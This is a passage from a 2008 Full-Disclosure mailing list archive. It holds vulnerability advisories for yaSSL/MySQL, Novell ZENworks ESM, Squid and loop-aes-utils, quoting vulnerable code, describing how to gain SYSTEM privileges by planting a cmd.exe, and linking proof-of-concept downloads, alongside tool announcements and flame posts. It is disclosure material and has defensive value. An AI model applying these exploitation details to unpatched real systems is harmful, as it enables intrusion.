    ...
    hello.id_len_ = input[AUTO];
    if (hello.id_len_) input.read(hello.session_id_, ID_LEN);
    
    // Suites
    byte tmp[2];
    tmp[0] = input[AUTO];
    tmp[1] = input[AUTO];
    ato16(tmp, hello.suite_len_);
    input.read(hello.cipher_suites_, hello.suite_len_);
    ...


-----------------------------------------------------
C] invalid memory access in HASHwithTransform::Update
-----------------------------------------------------

The usage of a too big size value in the Hello packet leads to a crash
of the library through the reading of data outside the memory
containing the incoming packet.

>From hash.cpp:

void HASHwithTransform::Update(const byte* data, word32 len)
{
    // do block size increments
    word32 blockSz = getBlockSize();
    byte*  local   = reinterpret_cast<byte*>(buffer_);

    while (len) {
        word32 add = min(len, blockSz - buffLen_);
        memcpy(&local[buffLen_], data, add);
        ...


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/yasslick.zip


#######################################################################

======
4) Fix
======


A mail has been sent to the developers yesterday during my tests only
to inform them of the vulnerabilities.


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org



From aluigi at autistici.org  Fri Jan  4 17:54:45 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Fri, 4 Jan 2008 18:54:45 +0100
Subject: [Full-disclosure] Pre-auth buffer-overflow in mySQL through yaSSL
Message-ID: <20080104185445.67a4e40a.aluigi@autistici.org>


The following is a proof-of-concept for testing the buffer-overflow
which affects yaSSL <= 1.7.5 on mySQL servers, any version, included the
latest 6.0.3:

  http://aluigi.org/poc/mysqlo.zip

The vulnerability is exploitable before authentication so the only
requirements for testing it are the usage of SSL on the server and
naturally having an IP address with access to the database.

By default mySQL uses yaSSL (1.6.0) for avoiding licences conflicts,
anyway if the test server has been compiled with specific OpenSSL
support it is NOT vulnerable.


--- 
Luigi Auriemma
http://aluigi.org



From fd at gomor.org  Fri Jan  4 18:12:55 2008
From: fd at gomor.org (GomoR)
Date: Fri, 4 Jan 2008 19:12:55 +0100
Subject: [Full-disclosure] SinFP fingerprinting tool online demo
In-Reply-To: <20080104185332.e8d46100.aluigi@autistici.org>
References: <20080104185332.e8d46100.aluigi@autistici.org>
Message-ID: <20080104181255.GA7751@nile.enslaved.lan>

Hello list,

for this new year, I put online a demonstration form for 
SinFP.

SinFP is an OS fingerprinting tool, which features:
- active AND passive fingerprinting
- works over IPv4 AND IPv6
- uses maximum 3 packets, all standards, targetted to one 
  open TCP port

The demo works only in IPv4 active mode.

Feel free to test this program online, and of course, to 
install it on your computer ;)

Right now, SinFP is included in BackTrack Linux distro.

Here is the link:
http://www.gomor.org/cgi-bin/sinfp.pl

And the direct link for the demo:
http://www.gomor.org/cgi-bin/sinfp-demo.pl

Best regards,

-- 
  ^  ___  ___             http://www.GomoR.org/          <-+
  | / __ |__/               Research Engineer              |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+



From secreview at hushmail.com  Fri Jan  4 21:27:51 2008
From: secreview at hushmail.com (secreview)
Date: Fri, 4 Jan 2008 13:27:51 -0800 (PST)
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed]
	Syrex ( B )
Message-ID: <1199482071875.3872ee95-cb2d-4d6c-8c4d-8b1aecc9f7b5@google.com>

Syrex, located at http://www.syrex.com, is a quality Professional IT
Security Services Provider that offers Risk Assessments, Risk
Mitigation, Security Management, Security Training and Incident
Response as well as advanced networking services. We found Syrex
because they came to us and requested that we perform a review, so here
are the results.Looking at the Syrex website was refreshing in
comparison to some of the other websites that we've reviewed. Not only
was theirs written clearly, but the services were well defined and the
content was complete. It is also clear that Syrex is ready to service a
wide range of companies based on the structure of their service
offerings. For example, under the Risk Assessment offering they have a
specific "Snapshot offering" to help meet the requirements of smaller
companies that can't afford a more intense service.Syrex is not your
average Professional IT Security Services Provider in that they do not
offer Penetration Testing or ethical hacking type services. They also
do not offer Web Application Security Assessments or source code
reviews (at least not yet). Instead, Syrex helps their customers by
performing complete or partial OSSTMM based security audits. The
results of those audits enables Syrex to enhance the overall security
of their customers IT Infrastructures by exposing weaknesses in
policies, proceedures, technologies, etc. and proving remediation
services. While these auditing services are not as technically deep as
penetration testing services, or web application security assessment
services, they do help to raise the proverbial security bar.When
speaking with the founder of Syrex, we learned that they do in fact
have talent. The founder himself has a deep understanding of Intrusion
Detection Systems ("IDS") and Intrusion Prevention Systems ("IPS"),
Security Information Management Systems ("SIMS"), network and routing
protocols, as well as key Cisco technologies like the ASA, Clean
Access, ACS, MARS, and CSM. In conjunction with this, he also has
experience as a programmer and understands quite a bit about malware,
viruses, and other malicious technologies. This is more than we can say
for a lot of the other companies that we've interviewed.Another thing
that we were impressed with during our telephone interview was the
amount of effort that Syrex put into being honest and ethical. On
multiple occasions they pointed out limitations in their service
capabilities, and at no point did they try to flaunt anything that they
were not certain about. This is the second company that we've
interviewed that did not make an effort to sound like they are the
best. Instead, they talk the talk and walk the walk.In conjunction with
the telephone interview and website review, we were given sample
reports and materials. When reviewing the reports it became immediately
clear that Syrex was focused on providing their customers with high
quality services that were in fact human driven. The reports were very
obviously not the product of automated tools, but instead were the
product of human talent. Again, this is more than we can say for a lot
of the companies that we review. Most companies these days seem to rely
heavily on automation and have little to no real human talent.All in
all we would recommend using Syrex if you are looking to increase your
levels of security. They will help you define methods for properly
managing and maintaining your network, people and information, all the
wile being honest and ethical. We almost feel bad giving Syrex a B
instead of an A, but they are missing research and development
capabilities, as well as advanced service delivery capabilities. Other
than that, great company! Keep up the good work Syrex!Score Card (
Click to Enlarge )

--
Posted By secreview to Professional IT Security Providers - Exposed at
1/04/2008 01:24:00 PM
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080104/0b7043f3/attachment.html 

From labs-no-reply at idefense.com  Fri Jan  4 21:42:46 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 04 Jan 2008 16:42:46 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.24.07: Novell
 ZENworks Endpoint Security Management Local Privilege Escalation
 Vulnerability
Message-ID: <477EA856.1020602@idefense.com>

iDefense Security Advisory 12.24.07
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 24, 2007

I. BACKGROUND

Novell ZENworks Endpoint Security Management (ESM) Security Client
provides centrally managed, policy based firewall protection for
clients. It is designed to be installed on all workstations within the
enterprise. More information is available on the vendor's site at the
following URL.

http://www.novell.com/products/zenworks/endpointsecuritymanagement/

II. DESCRIPTION

Local exploitation of a privilege escalation vulnerability in Novell
ZENworks Endpoint Security Management allows attackers to execute
arbitrary code with SYSTEM privileges.

When the ZENworks ESM Security Client is installed on a workstation, the
STEngine service is set to run under the local SYSTEM account. This
service is implemented within the following executable.

  File Name: STEngine.exe (1,847,296 bytes)
  Version: 3.5.0.20
  MD5: B5402A1EC8D04130304EBA89AF843916

The service provides functionality for any user to generate a diagnostic
report in order to aid in product troubleshooting. During report
generation, STEngine attempts to execute various scripts by spawning
command shells to gather system information. These scripts are
dynamically generated in a directory which all users may write to.

STEngine will also attempt to locate a command shell in this directory
and execute it if it is found. If a malicious local user places a
binary named "cmd.exe" in this directory, STEngine will execute it with
SYSTEM level privileges.

III. ANALYSIS

Exploitation allows unprivileged local users to take complete control of
the affected system.

Exploitation is trivial and does not require any special tools or coding
ability. If an attacker desires an interactive command prompt, a small
wrapper application will be required in order to ensure that the
command window is visible after execution.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in
STEngine.exe version 3.5.0.20 as included with Novell Inc's ZENworks
Endpoint Security Management 3.5. Other versions may also be affected.

V. WORKAROUND

iDefense is unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability by releasing version 3.5.0.82 of
Endpoint Security Management. To download this new version, visit the
following URL.

http://download.novell.com/Download?buildid=5Y6xbs-OKLE~

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5665 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/24/2007  Initial vendor notification
09/25/2007  Initial vendor response
12/24/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From security at mandriva.com  Fri Jan  4 23:42:45 2008
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 04 Jan 2008 16:42:45 -0700
Subject: [Full-disclosure] [ MDVSA-2008:002 ] - Updated squid package fixes
 remote denial of service
Message-ID: <E1JAwBZ-0007j5-IS@artemis.annvix.ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDVSA-2008:002
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : squid
 Date    : January 4, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________
 
 Problem Description:
 
 The cache update reply processing functionality in Squid 2.x before
 2.6.STABLE17, and Squid 3.0, allows remote attackers to cause a denial
 of service (crash) via unknown vectors related to HTTP headers.
 
 The updated package fixes this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6239
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 96faafb7a9e07b278a0aafa84bf926ae  2007.0/i586/squid-2.6.STABLE1-4.4mdv2007.0.i586.rpm
 03fad047effae58ca2489e80aa1bfa5b  2007.0/i586/squid-cachemgr-2.6.STABLE1-4.4mdv2007.0.i586.rpm 
 37dfa22f24df058851acc5c3c1b5879d  2007.0/SRPMS/squid-2.6.STABLE1-4.4mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 c2ed1ce138a117d92a9d1258e19853a4  2007.0/x86_64/squid-2.6.STABLE1-4.4mdv2007.0.x86_64.rpm
 8b1db434ee0e509aa71d7b1c81f62665  2007.0/x86_64/squid-cachemgr-2.6.STABLE1-4.4mdv2007.0.x86_64.rpm 
 37dfa22f24df058851acc5c3c1b5879d  2007.0/SRPMS/squid-2.6.STABLE1-4.4mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 4e5314934a52d574cfab66fab288fec1  2007.1/i586/squid-2.6.STABLE7-2.1mdv2007.1.i586.rpm
 ea5fff3e07bb15bca7a2c3b3fd1dce43  2007.1/i586/squid-cachemgr-2.6.STABLE7-2.1mdv2007.1.i586.rpm 
 8ae95395bd9b0bd3888561ce359048db  2007.1/SRPMS/squid-2.6.STABLE7-2.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 c4b1a7b86c812f272601c76c757a456e  2007.1/x86_64/squid-2.6.STABLE7-2.1mdv2007.1.x86_64.rpm
 48bd862e07da9f1aacbf8f4e30ebc734  2007.1/x86_64/squid-cachemgr-2.6.STABLE7-2.1mdv2007.1.x86_64.rpm 
 8ae95395bd9b0bd3888561ce359048db  2007.1/SRPMS/squid-2.6.STABLE7-2.1mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 471283e5ec222b4558804201ed528580  2008.0/i586/squid-2.6.STABLE16-1.2mdv2008.0.i586.rpm
 aae1cede196ab3ee8ce872a4f9339197  2008.0/i586/squid-cachemgr-2.6.STABLE16-1.2mdv2008.0.i586.rpm 
 3b7ac01f28af138e6a4a911ea13c3014  2008.0/SRPMS/squid-2.6.STABLE16-1.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 ee831d24d0027f9e30d329ba19481572  2008.0/x86_64/squid-2.6.STABLE16-1.2mdv2008.0.x86_64.rpm
 4d788055f21fd55b228881b66d4e351e  2008.0/x86_64/squid-cachemgr-2.6.STABLE16-1.2mdv2008.0.x86_64.rpm 
 3b7ac01f28af138e6a4a911ea13c3014  2008.0/SRPMS/squid-2.6.STABLE16-1.2mdv2008.0.src.rpm

 Corporate 3.0:
 b80be38521a9c761ddeb3fac585a5bef  corporate/3.0/i586/squid-2.5.STABLE9-1.8.C30mdk.i586.rpm 
 068c0327621ff22367dd979aa9f7ecee  corporate/3.0/SRPMS/squid-2.5.STABLE9-1.8.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 2c0eaf65b0c65bb56793bce55d2ac0fc  corporate/3.0/x86_64/squid-2.5.STABLE9-1.8.C30mdk.x86_64.rpm 
 068c0327621ff22367dd979aa9f7ecee  corporate/3.0/SRPMS/squid-2.5.STABLE9-1.8.C30mdk.src.rpm

 Corporate 4.0:
 69d5364d1187f459934c86e311bf6d96  corporate/4.0/i586/squid-2.6.STABLE1-4.4.20060mlcs4.i586.rpm
 9cab80bad8eac5d17af87f8411185529  corporate/4.0/i586/squid-cachemgr-2.6.STABLE1-4.4.20060mlcs4.i586.rpm 
 33c75a040e930c85e7668b160216558a  corporate/4.0/SRPMS/squid-2.6.STABLE1-4.4.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 37a81cbfac6f8937fd74e4b672e04019  corporate/4.0/x86_64/squid-2.6.STABLE1-4.4.20060mlcs4.x86_64.rpm
 df0f15a253003d6b2c234e4a5ccfbff1  corporate/4.0/x86_64/squid-cachemgr-2.6.STABLE1-4.4.20060mlcs4.x86_64.rpm 
 33c75a040e930c85e7668b160216558a  corporate/4.0/SRPMS/squid-2.6.STABLE1-4.4.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 0d291e6348ec79f86213230619ce7cfd  mnf/2.0/i586/squid-2.5.STABLE9-1.8.M20mdk.i586.rpm 
 2192fc9b2b9e1e000e144abf8e054860  mnf/2.0/SRPMS/squid-2.5.STABLE9-1.8.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iEYEARECAAYFAkd+mOMACgkQmqjQ0CJFipjgwACeLzJfKZn1RHqoqzVsxczyJcHO
v9kAn1gapJ/F6MciY5VtzOaHumprqySG
=Qb45
-----END PGP SIGNATURE-----



From sys at lfod.info  Sat Jan  5 00:12:03 2008
From: sys at lfod.info (sys at lfod.info)
Date: Sat, 05 Jan 2008 01:12:03 +0100
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <452214.1315441199301228241.JavaMail.servlet@perfora>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
Message-ID: <477ECB53.5070304@lfod.info>

Once a so-called security expert was pen-testing my VMS shop. We were 
having a nice chat while his eval version of GFI LANguard finished the 
scan, and got to talk about VMS. He didn't believe in the robust 
security of VMS and told me to do a search for vms on bugtraq, and see 
how many results came up.
So I did, and was horrified when I saw thousands of results... Until I 
noticed that the matched string in all the (barring perhaps 1 in 10000) 
results was "VMs"; not "VMS" or "vms".

(This was some years ago. The bugtraq search function's improved now.)

Randal T. Rioux wrote:
>> Valdis.Kletnieks at vt.edu said:
> 
>> Bonus points for knowing that VMS was mostly written in Bliss/32 or some 
>> such, and VM and MVS were a mixture of assembler and (later on) PL/S. 
>> No C knowledge needed for those critters...
> 
> OpenVMS is less than 40% Blissful... though I'm not familiar with the original source (wasn't it written on stone tablets?). About 50% is C, with a healthy mix of obsoletes making the difference. How something so elegant could be spawned from such chaos is beyond me.
> 
> Mostly, the VMS basic OS utilities are Bliss-based (think: GNU). 
> 
> I really wish HP would open OpenVMS before they kill it.
> 
> Security relevance: UNHACKABLE! <grin>
> 
> Randy
> 



From dudevanwinkle at gmail.com  Sat Jan  5 02:08:36 2008
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 4 Jan 2008 21:08:36 -0500
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <e9d9d4020801021148v689e2ca5q35aa49c084fef0f2@mail.gmail.com>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
	<25233.1199302350@turing-police.cc.vt.edu>
	<e9d9d4020801021148v689e2ca5q35aa49c084fef0f2@mail.gmail.com>
Message-ID: <e024ccca0801041808g31a5bf17i568b3f7bc00bfaab@mail.gmail.com>

On Jan 2, 2008 2:48 PM, reepex <reepex at gmail.com> wrote:
> sure signs of someone washed up as evident by your
> non-productiveness in the last few years ( and no - spamming mailing lists
> does not count )

Gee, I would think that setting up an emergency alert system (pager,
Phone, CCtv, SMTP, etc) for VT.edu would be considered "productive" by
anyones book..

Not all infosec is debuggers and fuzzers, sometimes you have to
"create" secure systems as part of a job.

-JP



From worriedsecurity at googlemail.com  Sat Jan  5 04:00:05 2008
From: worriedsecurity at googlemail.com (worried security)
Date: Sat, 5 Jan 2008 04:00:05 +0000
Subject: [Full-disclosure] Uber Lamer Ass of the Year. Vote!
In-Reply-To: <90865ed50801030754w14f327fcq7fad47902fac5821@mail.gmail.com>
References: <5c9b0ff50712221426u3e2d6b39y6ba8696e6491af27@mail.gmail.com>
	<90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com>
	<67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com>
	<90865ed50801030754w14f327fcq7fad47902fac5821@mail.gmail.com>
Message-ID: <67ea64530801042000g20d8d5a5j2bdd3c24ae45132e@mail.gmail.com>

On Jan 3, 2008 3:54 PM, damncon <damncon at gmail.com> wrote:
> btw im already signed in lulz
>

How clever are you---master of disguise.

I didn't know the gmail addresses that are garbbled and don't make up
anyones real name or organisation are the feds.

I expected them all to be on their official addresses for their
government departments if they signed up, how naive of me to think
that I thought we were fed free on n3td3v group.

I should assume in future that one random garbbled gmail address can
feed a whole security operations center of staff, so 4000+ gmail
addresses can feed a whole universe of world governments and
organisations.

Thanks for the tip off.

Valdis can you confirm this...



From Valdis.Kletnieks at vt.edu  Sat Jan  5 05:35:11 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sat, 05 Jan 2008 00:35:11 -0500
Subject: [Full-disclosure] Uber Lamer Ass of the Year. Vote!
In-Reply-To: Your message of "Sat, 05 Jan 2008 04:00:05 GMT."
	<67ea64530801042000g20d8d5a5j2bdd3c24ae45132e@mail.gmail.com>
References: <5c9b0ff50712221426u3e2d6b39y6ba8696e6491af27@mail.gmail.com>
	<90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com>
	<67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com>
	<90865ed50801030754w14f327fcq7fad47902fac5821@mail.gmail.com>
	<67ea64530801042000g20d8d5a5j2bdd3c24ae45132e@mail.gmail.com>
Message-ID: <14446.1199511311@turing-police.cc.vt.edu>

On Sat, 05 Jan 2008 04:00:05 GMT, worried security said:

> I expected them all to be on their official addresses for their
> government departments if they signed up, how naive of me to think
> that I thought we were fed free on n3td3v group.

> Valdis can you confirm this...

Yes, I can confirm that you're naive.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080105/064b1b92/attachment.bin 

From skx at debian.org  Sat Jan  5 15:09:31 2008
From: skx at debian.org (Steve Kemp)
Date: Sat, 5 Jan 2008 15:09:31 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1449-1] New loop-aes-utils
	packages fix programming error
Message-ID: <20080105150931.GA19854@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1449-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
January 05, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : loop-aes-utils
Vulnerability  : programming error
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2007-5191

It was discovered that loop-aes-utils, tools for mounting and manipulating
filesystems, didn't drop privileged users and groups in the correct order
in the mount and umount commands.  This could potentially allow a local
user to gain additional privileges.

For the stable distribution (etch), this problem has been fixed in version
2.12r-15+etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 2.12p-4sarge2.

We recommend that you upgrade your loop-aes-utils package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2.dsc
    Size/MD5 checksum:      684 df895a3729db10a19896a9251d4af5b2
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p.orig.tar.gz
    Size/MD5 checksum:  2001658 d47e820f6880c21c8b4c0c7e8a7376cc
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2.diff.gz
    Size/MD5 checksum:    69885 c9e24c3959fbac7e69f4d3ac1c6e672b

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_alpha.deb
    Size/MD5 checksum:   170466 00b1327015aec6a2b3956ffa8bfdee89

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_amd64.deb
    Size/MD5 checksum:   150678 e17bf96e4c9867deb261202ef4eeca54

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_arm.deb
    Size/MD5 checksum:   138000 0d8676188c35b75983c57028712bf47f

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_hppa.deb
    Size/MD5 checksum:   156870 61d0ebc346c6c30ac65a23d2dd41589d

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_i386.deb
    Size/MD5 checksum:   142336 caa1aa50c22e9de3beb71ee7ab40df94

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_ia64.deb
    Size/MD5 checksum:   191160 9283e92cd4264c0f569eafba62857543

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_m68k.deb
    Size/MD5 checksum:   132518 77916de1d6874cc2892f81c50e48d317

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_mips.deb
    Size/MD5 checksum:   159770 3620a7cce148a8a4220dbfcd82045151

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_mipsel.deb
    Size/MD5 checksum:   160354 e23471a1fb0de436cfd564b14192d1b8

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_powerpc.deb
    Size/MD5 checksum:   155348 0ef3e79e1772e4af4f145900faa09fc1

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_s390.deb
    Size/MD5 checksum:   153500 5895ea5a39a63451214a5fb4885f851c

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12p-4sarge2_sparc.deb
    Size/MD5 checksum:   142348 9305eddb7b241033025ea36261a2ef77


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1.diff.gz
    Size/MD5 checksum:   101918 90793118f962ba30a5fb4be50181477e
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1.dsc
    Size/MD5 checksum:      735 9e405af43b332e2b023ce6aa61d2649a

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_alpha.deb
    Size/MD5 checksum:   196482 2bd6f59b03c311a30f5f9aac946c1eea
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_alpha.udeb
    Size/MD5 checksum:   132504 450dad143036ef7159148f40f4e5a6a9

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_amd64.udeb
    Size/MD5 checksum:   107182 dbbeab22b6bcb4a77801b998f6ead09b
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_amd64.deb
    Size/MD5 checksum:   172048 d4acc364881af7cf058702c32f872a84

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_arm.udeb
    Size/MD5 checksum:   104766 772bda8ca1002b0caef0b39a67f904f6
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_arm.deb
    Size/MD5 checksum:   164256 33e7014926685647ae27b644baede16c

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_hppa.udeb
    Size/MD5 checksum:   115246 912dba834dbb383f40fbd6cafc4b2c3d
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_hppa.deb
    Size/MD5 checksum:   179032 e50842c1fbb0ef8a3ecb348593befc8d

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_i386.udeb
    Size/MD5 checksum:    95076 f38103e726463b9b0c98c01203fd602a
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_i386.deb
    Size/MD5 checksum:   160020 499837a486184a21f6afcca8726c0273

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_ia64.deb
    Size/MD5 checksum:   230094 1b839e33a34cf8d89c2a442feec9cb00
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_ia64.udeb
    Size/MD5 checksum:   166514 0628676d7662cd3858f7a80ed82578fc

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_mips.deb
    Size/MD5 checksum:   187606 6574d57c10425b130f1191fcabf8cc8f
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_mips.udeb
    Size/MD5 checksum:   123634 b81dd65a744d167b7e98768fe839164f

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_mipsel.deb
    Size/MD5 checksum:   188344 416b7ce33e10f8ff7680c09b9d06fe86
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_mipsel.udeb
    Size/MD5 checksum:   124248 be5f8fe9a89c9c6c4e0a4faf445c0e3b

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_powerpc.deb
    Size/MD5 checksum:   177744 f9d630809127c199e0654bc163e92dcf
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_powerpc.udeb
    Size/MD5 checksum:   114230 796a4c19d00d7242ad860438861ab535

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_s390.deb
    Size/MD5 checksum:   175142 bcc940ba6e4f90181d80c31b28a28f7c
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_s390.udeb
    Size/MD5 checksum:   111690 2b225427ef2147e5c9505bd609da54a3

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/l/loop-aes-utils/mount-aes-udeb_2.12r-15+etch1_sparc.udeb
    Size/MD5 checksum:   101622 59df1b3664d188e9eb5e020d6d908de7
  http://security.debian.org/pool/updates/main/l/loop-aes-utils/loop-aes-utils_2.12r-15+etch1_sparc.deb
    Size/MD5 checksum:   165678 523b14ea089e0b0606c1eef6ebfc5e4e


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
